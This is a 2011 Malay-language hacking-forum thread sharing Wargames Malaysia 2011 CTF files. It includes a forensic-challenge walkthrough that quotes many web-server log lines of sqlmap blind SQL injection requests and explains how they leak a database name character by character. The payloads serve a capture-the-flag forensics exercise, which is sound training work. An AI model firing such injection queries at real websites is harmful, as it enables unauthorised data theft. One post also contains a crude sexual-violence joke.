TBD.my

**p0pc0rn** · (This post was last modified: 04-07-2011 10:50 AM by p0pc0rn.)

wargames2011 ade sikit yg aku dapat dari sape tah..ttbe je bg kt aku suh share..

Code:

http://www.filehosting.org/file/details/243552/tbd.rar

Code:

http://www.fileserve.com/file/DDwDN6J

Code:

http://www.wupload.com/file/43128258/tbd.rar

Code:

http://www.filesonic.com/file/1363827434/tbd.rar

Code:

http://www.multiupload.com/I2SN3RV1SE

crypto 100 200
Network 100 200
Puzzle 100 200
Binary 100
Forensic 100 200
-------------------------
updated with
binary 300
network 200
crypto 300

Code:

http://www.multiupload.com/S3ZBO8M63F

sape2 nk tambah,nak mirror digalakkan

solution untuk crypto 100

Code:

http://w3.tbd.my/thread-8982-post-103163.html

solution crypto 200

Code:

http://w3.tbd.my/thread-8983-post-103280.html#pid103280

solution untuk crypto 300

Code:

http://w3.tbd.my/thread-8979-post-103148.html

solution forensic 200

Code:

http://w3.tbd.my/thread-8983-post-103220.html#pid103220

solution binary 100

Code:

http://w3.tbd.my/thread-8988-lastpost.html

solution puzzle 100

Code:

http://w3.tbd.my/thread-8983-post-103271.html#pid103271

updated ngn bonus challenge

Code:

http://w3.tbd.my/thread-9860.html

**johnburn** · 04-07-2011, 11:33 AM

xleh nk donlod Sad

pleh upload ke file hosting yg kurg GayFace

x (mediafire ke)
pliss

**p0pc0rn** · (This post was last modified: 04-07-2011 01:03 PM by p0pc0rn.)

aku takle upload kt mediafire T___T
sape2 nk aku emel then tolog upload

Code:

http://www.fileserve.com/file/DDwDN6J

Tron · 04-07-2011, 01:03 PM

tumpang belajar ye master 2 semua Sad

**p0pc0rn** · (This post was last modified: 04-07-2011 01:13 PM by p0pc0rn.)

Code:

http://www.wupload.com/file/43128258/tbd.rar

Code:

http://www.filesonic.com/file/1363827434/tbd.rar

Code:

http://www.multiupload.com/I2SN3RV1SE

**ak47suk1** · 04-07-2011, 01:55 PM

mirror, direct donlod - http://lix.in/-9a3bab

**johnburn** · 04-07-2011, 02:11 PM

Forensic200 kut GayFace

Dari readme:

Quote:OHMAIGAWD! It seems like we've been hacked! But what did the hackers steal? From the logs, it seems like they exploited an SQL injection bug on our website. Help us find the name of the database that they stole and we shall reward you handsomely.

Dari log:

Quote:172.16.61.1 - - [25/May/2011:08:25:06 -0400] "GET /news.php?id=1 AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR(10000)), CHAR(32))), 1, 1)) > 64 AND 3400=3400 HTTP/1.1" 200 271 "-" "sqlmap/0.8 (http://sqlmap.sourceforge.net)"
172.16.61.1 - - [25/May/2011:08:25:06 -0400] "GET /news.php?id=1 AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR(10000)), CHAR(32))), 1, 1)) > 96 AND 3400=3400 HTTP/1.1" 200 271 "-" "sqlmap/0.8 (http://sqlmap.sourceforge.net)"
172.16.61.1 - - [25/May/2011:08:25:06 -0400] "GET /news.php?id=1 AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR(10000)), CHAR(32))), 1, 1)) > 112 AND 3400=3400 HTTP/1.1" 200 271 "-" "sqlmap/0.8 (http://sqlmap.sourceforge.net)"
172.16.61.1 - - [25/May/2011:08:25:06 -0400] "GET /news.php?id=1 AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR(10000)), CHAR(32))), 1, 1)) > 120 AND 3400=3400 HTTP/1.1" 200 221 "-" "sqlmap/0.8 (http://sqlmap.sourceforge.net)"
172.16.61.1 - - [25/May/2011:08:25:06 -0400] "GET /news.php?id=1 AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR(10000)), CHAR(32))), 1, 1)) > 116 AND 3400=3400 HTTP/1.1" 200 271 "-" "sqlmap/0.8 (http://sqlmap.sourceforge.net)"
172.16.61.1 - - [25/May/2011:08:25:06 -0400] "GET /news.php?id=1 AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR(10000)), CHAR(32))), 1, 1)) > 118 AND 3400=3400 HTTP/1.1" 200 271 "-" "sqlmap/0.8 (http://sqlmap.sourceforge.net)"
172.16.61.1 - - [25/May/2011:08:25:06 -0400] "GET /news.php?id=1 AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR(10000)), CHAR(32))), 1, 1)) > 119 AND 3400=3400 HTTP/1.1" 200 221 "-" "sqlmap/0.8 (http://sqlmap.sourceforge.net)"
172.16.61.1 - - [25/May/2011:08:25:06 -0400] "GET /news.php?id=1 AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR(10000)), CHAR(32))), 2, 1)) > 64 AND 3400=3400 HTTP/1.1" 200 271 "-" "sqlmap/0.8 (http://sqlmap.sourceforge.net)"
172.16.61.1 - - [25/May/2011:08:25:06 -0400] "GET /news.php?id=1 AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR(10000)), CHAR(32))), 2, 1)) > 96 AND 3400=3400 HTTP/1.1" 200 271 "-" "sqlmap/0.8 (http://sqlmap.sourceforge.net)"
172.16.61.1 - - [25/May/2011:08:25:06 -0400] "GET /news.php?id=1 AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR(10000)), CHAR(32))), 2, 1)) > 112 AND 3400=3400 HTTP/1.1" 200 221 "-" "sqlmap/0.8 (http://sqlmap.sourceforge.net)"
172.16.61.1 - - [25/May/2011:08:25:06 -0400] "GET /news.php?id=1 AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR(10000)), CHAR(32))), 2, 1)) > 104 AND 3400=3400 HTTP/1.1" 200 221 "-" "sqlmap/0.8 (http://sqlmap.sourceforge.net)"
172.16.61.1 - - [25/May/2011:08:25:06 -0400] "GET /news.php?id=1 AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR(10000)), CHAR(32))), 2, 1)) > 100 AND 3400=3400 HTTP/1.1" 200 271 "-" "sqlmap/0.8 (http://sqlmap.sourceforge.net)"
172.16.61.1 - - [25/May/2011:08:25:06 -0400] "GET /news.php?id=1 AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR(10000)), CHAR(32))), 2, 1)) > 102 AND 3400=3400 HTTP/1.1" 200 271 "-" "sqlmap/0.8 (http://sqlmap.sourceforge.net)"
172.16.61.1 - - [25/May/2011:08:25:06 -0400] "GET /news.php?id=1 AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR(10000)), CHAR(32))), 2, 1)) > 103 AND 3400=3400 HTTP/1.1" 200 221 "-" "sqlmap/0.8 (http://sqlmap.sourceforge.net)"
172.16.61.1 - - [25/May/2011:08:25:06 -0400] "GET /news.php?id=1 AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR(10000)), CHAR(32))), 3, 1)) > 64 AND 3400=3400 HTTP/1.1" 200 271 "-" "sqlmap/0.8 (http://sqlmap.sourceforge.net)"
172.16.61.1 - - [25/May/2011:08:25:06 -0400] "GET /news.php?id=1 AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR(10000)), CHAR(32))), 3, 1)) > 96 AND 3400=3400 HTTP/1.1" 200 271 "-" "sqlmap/0.8 (http://sqlmap.sourceforge.net)"
172.16.61.1 - - [25/May/2011:08:25:06 -0400] "GET /news.php?id=1 AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR(10000)), CHAR(32))), 3, 1)) > 112 AND 3400=3400 HTTP/1.1" 200 221 "-" "sqlmap/0.8 (http://sqlmap.sourceforge.net)"
172.16.61.1 - - [25/May/2011:08:25:06 -0400] "GET /news.php?id=1 AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR(10000)), CHAR(32))), 3, 1)) > 104 AND 3400=3400 HTTP/1.1" 200 271 "-" "sqlmap/0.8 (http://sqlmap.sourceforge.net)"
172.16.61.1 - - [25/May/2011:08:25:06 -0400] "GET /news.php?id=1 AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR(10000)), CHAR(32))), 3, 1)) > 108 AND 3400=3400 HTTP/1.1" 200 271 "-" "sqlmap/0.8 (http://sqlmap.sourceforge.net)"
172.16.61.1 - - [25/May/2011:08:25:06 -0400] "GET /news.php?id=1 AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR(10000)), CHAR(32))), 3, 1)) > 110 AND 3400=3400 HTTP/1.1" 200 221 "-" "sqlmap/0.8 (http://sqlmap.sourceforge.net)"
172.16.61.1 - - [25/May/2011:08:25:06 -0400] "GET /news.php?id=1 AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR(10000)), CHAR(32))), 3, 1)) > 109 AND 3400=3400 HTTP/1.1" 200 221 "-" "sqlmap/0.8 (http://sqlmap.sourceforge.net)"
172.16.61.1 - - [25/May/2011:08:25:06 -0400] "GET /news.php?id=1 AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR(10000)), CHAR(32))), 4, 1)) > 64 AND 3400=3400 HTTP/1.1" 200 271 "-" "sqlmap/0.8 (http://sqlmap.sourceforge.net)"
172.16.61.1 - - [25/May/2011:08:25:06 -0400] "GET /news.php?id=1 AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR(10000)), CHAR(32))), 4, 1)) > 96 AND 3400=3400 HTTP/1.1" 200 271 "-" "sqlmap/0.8 (http://sqlmap.sourceforge.net)"
172.16.61.1 - - [25/May/2011:08:25:06 -0400] "GET /news.php?id=1 AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR(10000)), CHAR(32))), 4, 1)) > 112 AND 3400=3400 HTTP/1.1" 200 271 "-" "sqlmap/0.8 (http://sqlmap.sourceforge.net)"
172.16.61.1 - - [25/May/2011:08:25:06 -0400] "GET /news.php?id=1 AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR(10000)), CHAR(32))), 4, 1)) > 120 AND 3400=3400 HTTP/1.1" 200 271 "-" "sqlmap/0.8 (http://sqlmap.sourceforge.net)"
172.16.61.1 - - [25/May/2011:08:25:06 -0400] "GET /news.php?id=1 AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR(10000)), CHAR(32))), 4, 1)) > 124 AND 3400=3400 HTTP/1.1" 200 221 "-" "sqlmap/0.8 (http://sqlmap.sourceforge.net)"
172.16.61.1 - - [25/May/2011:08:25:06 -0400] "GET /news.php?id=1 AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR(10000)), CHAR(32))), 4, 1)) > 122 AND 3400=3400 HTTP/1.1" 200 221 "-" "sqlmap/0.8 (http://sqlmap.sourceforge.net)"
172.16.61.1 - - [25/May/2011:08:25:06 -0400] "GET /news.php?id=1 AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR(10000)), CHAR(32))), 4, 1)) > 121 AND 3400=3400 HTTP/1.1" 200 221 "-" "sqlmap/0.8 (http://sqlmap.sourceforge.net)"
172.16.61.1 - - [25/May/2011:08:25:06 -0400] "GET /news.php?id=1 AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR(10000)), CHAR(32))), 5, 1)) > 64 AND 3400=3400 HTTP/1.1" 200 221 "-" "sqlmap/0.8 (http://sqlmap.sourceforge.net)"
172.16.61.1 - - [25/May/2011:08:25:06 -0400] "GET /news.php?id=1 AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR(10000)), CHAR(32))), 5, 1)) > 32 AND 3400=3400 HTTP/1.1" 200 271 "-" "sqlmap/0.8 (http://sqlmap.sourceforge.net)"
172.16.61.1 - - [25/May/2011:08:25:06 -0400] "GET /news.php?id=1 AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR(10000)), CHAR(32))), 5, 1)) > 48 AND 3400=3400 HTTP/1.1" 200 271 "-" "sqlmap/0.8 (http://sqlmap.sourceforge.net)"
172.16.61.1 - - [25/May/2011:08:25:06 -0400] "GET /news.php?id=1 AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR(10000)), CHAR(32))), 5, 1)) > 56 AND 3400=3400 HTTP/1.1" 200 221 "-" "sqlmap/0.8 (http://sqlmap.sourceforge.net)"
172.16.61.1 - - [25/May/2011:08:25:06 -0400] "GET /news.php?id=1 AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR(10000)), CHAR(32))), 5, 1)) > 52 AND 3400=3400 HTTP/1.1" 200 221 "-" "sqlmap/0.8 (http://sqlmap.sourceforge.net)"
172.16.61.1 - - [25/May/2011:08:25:06 -0400] "GET /news.php?id=1 AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR(10000)), CHAR(32))), 5, 1)) > 50 AND 3400=3400 HTTP/1.1" 200 221 "-" "sqlmap/0.8 (http://sqlmap.sourceforge.net)"
172.16.61.1 - - [25/May/2011:08:25:06 -0400] "GET /news.php?id=1 AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR(10000)), CHAR(32))), 5, 1)) > 49 AND 3400=3400 HTTP/1.1" 200 271 "-" "sqlmap/0.8 (http://sqlmap.sourceforge.net)"
172.16.61.1 - - [25/May/2011:08:25:06 -0400] "GET /news.php?id=1 AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR(10000)), CHAR(32))), 6, 1)) > 64 AND 3400=3400 HTTP/1.1" 200 221 "-" "sqlmap/0.8 (http://sqlmap.sourceforge.net)"
172.16.61.1 - - [25/May/2011:08:25:06 -0400] "GET /news.php?id=1 AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR(10000)), CHAR(32))), 6, 1)) > 32 AND 3400=3400 HTTP/1.1" 200 271 "-" "sqlmap/0.8 (http://sqlmap.sourceforge.net)"
172.16.61.1 - - [25/May/2011:08:25:06 -0400] "GET /news.php?id=1 AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR(10000)), CHAR(32))), 6, 1)) > 48 AND 3400=3400 HTTP/1.1" 200 221 "-" "sqlmap/0.8 (http://sqlmap.sourceforge.net)"
172.16.61.1 - - [25/May/2011:08:25:06 -0400] "GET /news.php?id=1 AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR(10000)), CHAR(32))), 6, 1)) > 40 AND 3400=3400 HTTP/1.1" 200 271 "-" "sqlmap/0.8 (http://sqlmap.sourceforge.net)"
172.16.61.1 - - [25/May/2011:08:25:06 -0400] "GET /news.php?id=1 AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR(10000)), CHAR(32))), 6, 1)) > 44 AND 3400=3400 HTTP/1.1" 200 271 "-" "sqlmap/0.8 (http://sqlmap.sourceforge.net)"
172.16.61.1 - - [25/May/2011:08:25:06 -0400] "GET /news.php?id=1 AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR(10000)), CHAR(32))), 6, 1)) > 46 AND 3400=3400 HTTP/1.1" 200 271 "-" "sqlmap/0.8 (http://sqlmap.sourceforge.net)"
172.16.61.1 - - [25/May/2011:08:25:06 -0400] "GET /news.php?id=1 AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR(10000)), CHAR(32))), 6, 1)) > 47 AND 3400=3400 HTTP/1.1" 200 271 "-" "sqlmap/0.8 (http://sqlmap.sourceforge.net)"
172.16.61.1 - - [25/May/2011:08:25:06 -0400] "GET /news.php?id=1 AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR(10000)), CHAR(32))), 7, 1)) > 64 AND 3400=3400 HTTP/1.1" 200 221 "-" "sqlmap/0.8 (http://sqlmap.sourceforge.net)"
172.16.61.1 - - [25/May/2011:08:25:06 -0400] "GET /news.php?id=1 AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR(10000)), CHAR(32))), 7, 1)) > 32 AND 3400=3400 HTTP/1.1" 200 271 "-" "sqlmap/0.8 (http://sqlmap.sourceforge.net)"
172.16.61.1 - - [25/May/2011:08:25:06 -0400] "GET /news.php?id=1 AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR(10000)), CHAR(32))), 7, 1)) > 48 AND 3400=3400 HTTP/1.1" 200 271 "-" "sqlmap/0.8 (http://sqlmap.sourceforge.net)"
172.16.61.1 - - [25/May/2011:08:25:06 -0400] "GET /news.php?id=1 AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR(10000)), CHAR(32))), 7, 1)) > 56 AND 3400=3400 HTTP/1.1" 200 221 "-" "sqlmap/0.8 (http://sqlmap.sourceforge.net)"
172.16.61.1 - - [25/May/2011:08:25:06 -0400] "GET /news.php?id=1 AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR(10000)), CHAR(32))), 7, 1)) > 52 AND 3400=3400 HTTP/1.1" 200 221 "-" "sqlmap/0.8 (http://sqlmap.sourceforge.net)"
172.16.61.1 - - [25/May/2011:08:25:06 -0400] "GET /news.php?id=1 AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR(10000)), CHAR(32))), 7, 1)) > 50 AND 3400=3400 HTTP/1.1" 200 221 "-" "sqlmap/0.8 (http://sqlmap.sourceforge.net)"
172.16.61.1 - - [25/May/2011:08:25:06 -0400] "GET /news.php?id=1 AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR(10000)), CHAR(32))), 7, 1)) > 49 AND 3400=3400 HTTP/1.1" 200 221 "-" "sqlmap/0.8 (http://sqlmap.sourceforge.net)"
172.16.61.1 - - [25/May/2011:08:25:06 -0400] "GET /news.php?id=1 AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR(10000)), CHAR(32))), 8, 1)) > 64 AND 3400=3400 HTTP/1.1" 200 221 "-" "sqlmap/0.8 (http://sqlmap.sourceforge.net)"
172.16.61.1 - - [25/May/2011:08:25:06 -0400] "GET /news.php?id=1 AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR(10000)), CHAR(32))), 8, 1)) > 32 AND 3400=3400 HTTP/1.1" 200 271 "-" "sqlmap/0.8 (http://sqlmap.sourceforge.net)"
172.16.61.1 - - [25/May/2011:08:25:06 -0400] "GET /news.php?id=1 AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR(10000)), CHAR(32))), 8, 1)) > 48 AND 3400=3400 HTTP/1.1" 200 271 "-" "sqlmap/0.8 (http://sqlmap.sourceforge.net)"
172.16.61.1 - - [25/May/2011:08:25:06 -0400] "GET /news.php?id=1 AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR(10000)), CHAR(32))), 8, 1)) > 56 AND 3400=3400 HTTP/1.1" 200 221 "-" "sqlmap/0.8 (http://sqlmap.sourceforge.net)"
172.16.61.1 - - [25/May/2011:08:25:06 -0400] "GET /news.php?id=1 AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR(10000)), CHAR(32))), 8, 1)) > 52 AND 3400=3400 HTTP/1.1" 200 221 "-" "sqlmap/0.8 (http://sqlmap.sourceforge.net)"
172.16.61.1 - - [25/May/2011:08:25:06 -0400] "GET /news.php?id=1 AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR(10000)), CHAR(32))), 8, 1)) > 50 AND 3400=3400 HTTP/1.1" 200 221 "-" "sqlmap/0.8 (http://sqlmap.sourceforge.net)"
172.16.61.1 - - [25/May/2011:08:25:06 -0400] "GET /news.php?id=1 AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR(10000)), CHAR(32))), 8, 1)) > 49 AND 3400=3400 HTTP/1.1" 200 221 "-" "sqlmap/0.8 (http://sqlmap.sourceforge.net)"
172.16.61.1 - - [25/May/2011:08:25:06 -0400] "GET /news.php?id=1 AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR(10000)), CHAR(32))), 9, 1)) > 64 AND 3400=3400 HTTP/1.1" 200 221 "-" "sqlmap/0.8 (http://sqlmap.sourceforge.net)"
172.16.61.1 - - [25/May/2011:08:25:06 -0400] "GET /news.php?id=1 AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR(10000)), CHAR(32))), 9, 1)) > 32 AND 3400=3400 HTTP/1.1" 200 221 "-" "sqlmap/0.8 (http://sqlmap.sourceforge.net)"
172.16.61.1 - - [25/May/2011:08:25:06 -0400] "GET /news.php?id=1 AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR(10000)), CHAR(32))), 9, 1)) > 16 AND 3400=3400 HTTP/1.1" 200 221 "-" "sqlmap/0.8 (http://sqlmap.sourceforge.net)"
172.16.61.1 - - [25/May/2011:08:25:06 -0400] "GET /news.php?id=1 AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR(10000)), CHAR(32))), 9, 1)) > 8 AND 3400=3400 HTTP/1.1" 200 221 "-" "sqlmap/0.8 (http://sqlmap.sourceforge.net)"
172.16.61.1 - - [25/May/2011:08:25:06 -0400] "GET /news.php?id=1 AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR(10000)), CHAR(32))), 9, 1)) > 4 AND 3400=3400 HTTP/1.1" 200 221 "-" "sqlmap/0.8 (http://sqlmap.sourceforge.net)"
172.16.61.1 - - [25/May/2011:08:25:06 -0400] "GET /news.php?id=1 AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR(10000)), CHAR(32))), 9, 1)) > 2 AND 3400=3400 HTTP/1.1" 200 221 "-" "sqlmap/0.8 (http://sqlmap.sourceforge.net)"
172.16.61.1 - - [25/May/2011:08:25:06 -0400] "GET /news.php?id=1 AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR(10000)), CHAR(32))), 9, 1)) > 1 AND 3400=3400 HTTP/1.1" 200 221 "-" "sqlmap/0.8 (http://sqlmap.sourceforge.net)"

Penerangan:

Quote:1 AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR(10000)), CHAR(32))), 1, 1)) > 64 AND 3400=3400

Boleh diterjemahkan ke sql:

Quote:SELECT somecolumn FROM sometable WHERE id=1 AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR(10000)), CHAR(32))), 1, 1)) > 64 AND 3400=3400

Part yang diboldkan tu akan return true (1) jika ASCII value untuk character pertama dari nama current database lebih besar dari 64.

So kita boleh dapatkan ASCII value untuk character pertama database dengan cara menaikkan nilai 64 tadi sehingga satu nilai yang return false (0). Selepas false kita uji plak untuk character kedua, sampai la abes.

So dah dapat suma, kita convert la dari ASCII value ke ASCII:

PHP Code:

<?php
$false_value_untuk_each_characters = array(119,102,109,122,49,46,49,50,1);
foreach($false_value_untuk_each_characters as $character){
echo chr($character-1);
}
?>

Quote:john@john-Latitude-E6410:~/Desktop$ php forensic200.php
vely0-01

p/s: xtau btol ke salah, mungkin popcorn leh kompemkan

**p0pc0rn** · (This post was last modified: 04-07-2011 02:18 PM by p0pc0rn.)

salah

jwpn dia wgmy2011

sexplaination aku rs da betul.tp myb aku takpaham script/programming so tak sure salah ape..aku wat manually je compare ngn ascii table

**johnburn** · 04-07-2011, 02:23 PM

(04-07-2011 02:18 PM)p0pc0rn Wrote: salah
jwpn dia wgmy2011
sexplaination aku rs da betul.tp myb aku takpaham script/programming so tak sure salah ape..aku wat manually je compare ngn ascii table

dh tau dh mana salah GayFace

aku xtgk btol2 log just amek kt dia tukar character je (1,1 > 2,1 > etc) pdhal dia pnya compare dlm log tu x ikut turutan dari kecik ke besar lol
jap aku tukar GayFace

**p0pc0rn** · (This post was last modified: 04-07-2011 02:31 PM by p0pc0rn.)

aku amik contoh utk 6th char

Code:

16.61.1 - - [25/May/2011:08:25:06 -0400] "GET /news.php?id=1 AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR(10000)), CHAR(32))), 6, 1)) > 64 AND 3400=3400 HTTP/1.1" 200 221 "-" "sqlmap/0.8 (http://sqlmap.sourceforge.net)"

16.61.1 - - [25/May/2011:08:25:06 -0400] "GET /news.php?id=1 AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR(10000)), CHAR(32))), 6, 1)) > 32 AND 3400=3400 HTTP/1.1" 200 271 "-" "sqlmap/0.8 (http://sqlmap.sourceforge.net)"

16.61.1 - - [25/May/2011:08:25:06 -0400] "GET /news.php?id=1 AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR(10000)), CHAR(32))), 6, 1)) > 48 AND 3400=3400 HTTP/1.1" 200 221 "-" "sqlmap/0.8 (http://sqlmap.sourceforge.net)"

16.61.1 - - [25/May/2011:08:25:06 -0400] "GET /news.php?id=1 AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR(10000)), CHAR(32))), 6, 1)) > 40 AND 3400=3400 HTTP/1.1" 200 271 "-" "sqlmap/0.8 (http://sqlmap.sourceforge.net)"

16.61.1 - - [25/May/2011:08:25:06 -0400] "GET /news.php?id=1 AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR(10000)), CHAR(32))), 6, 1)) > 44 AND 3400=3400 HTTP/1.1" 200 271 "-" "sqlmap/0.8 (http://sqlmap.sourceforge.net)"

16.61.1 - - [25/May/2011:08:25:06 -0400] "GET /news.php?id=1 AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR(10000)), CHAR(32))), 6, 1)) > 46 AND 3400=3400 HTTP/1.1" 200 271 "-" "sqlmap/0.8 (http://sqlmap.sourceforge.net)"

16.61.1 - - [25/May/2011:08:25:06 -0400] "GET /news.php?id=1 AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR(10000)), CHAR(32))), 6, 1)) > 47 AND

just cek utk 2 char yg last jeh aku wat.
> 32 true which means char tu bkn char yg ke dec=33
> 48 false thats y next step dia reduce char jadi char dec=40
> 40 true then up jd 44
> 44 still true dia try 46
> 46 still true then dia test 47
> 47 true then dia stop. sbb?

dia da test > 48 adalah salah which is dec 49 is not the right char
lastly dia test > 47 which is char dec=48
so char yg betul adelah usha kt ascii table
dec =48 --> 0

then go on utk char yg lain2 GayFace

ni bkn aku yg wat..sape tah kasik solution

**johnburn** · 04-07-2011, 02:33 PM

yeah mcm tu
aku xtgk btol2 log igtkn sqlmap dia buat nek satu2 smpai false GayFace

so sapa2 nk try sila baca penerangan popcorn untuk lbh faham Big Grin

**ak47suk1** · 04-07-2011, 03:44 PM

(04-07-2011 02:33 PM)johnburn Wrote: yeah mcm tu
aku xtgk btol2 log igtkn sqlmap dia buat nek satu2 smpai false
so sapa2 nk try sila baca penerangan popcorn untuk lbh faham

Sebab tu sqlmap sedut cepat GayFace

. +rape both u n p0pc0rn.

**p0pc0rn** · 04-07-2011, 04:03 PM

updated with
binary 300
network 200
crypto 300

Code:

http://www.multiupload.com/S3ZBO8M63F

r3v3r7 · 04-07-2011, 04:18 PM

puzzle 200:

Code:

QWgsIHlvdSBoYXZlIGRlY29kZSB0aGUgcXItY29kZS4gTm93IHByb2NlZWQgd2l0aCB0aGUgaW1hZ2Vz​LiBZb3UgaGF2ZSB0byBzb2x2ZSB0aGUgZXF1YXRpb24gb24gaXQuIFRoYXQgc2hvdWxkIGJlIHlvdXIg​ZmxhZw==

POC math plz..

najashark · (This post was last modified: 11-07-2011 11:31 AM by najashark.)

http://www.mediafire.com/?v5pvj5p5tz2fd9u

-binary100
-binary200
-binary300
-bonus
-crypto100
-crypto200
-crypto300
-forensics100
-forensics200
-network100
-network200
-network300
-puzzle100
-puzzle200

Username:
Password:
Remember Me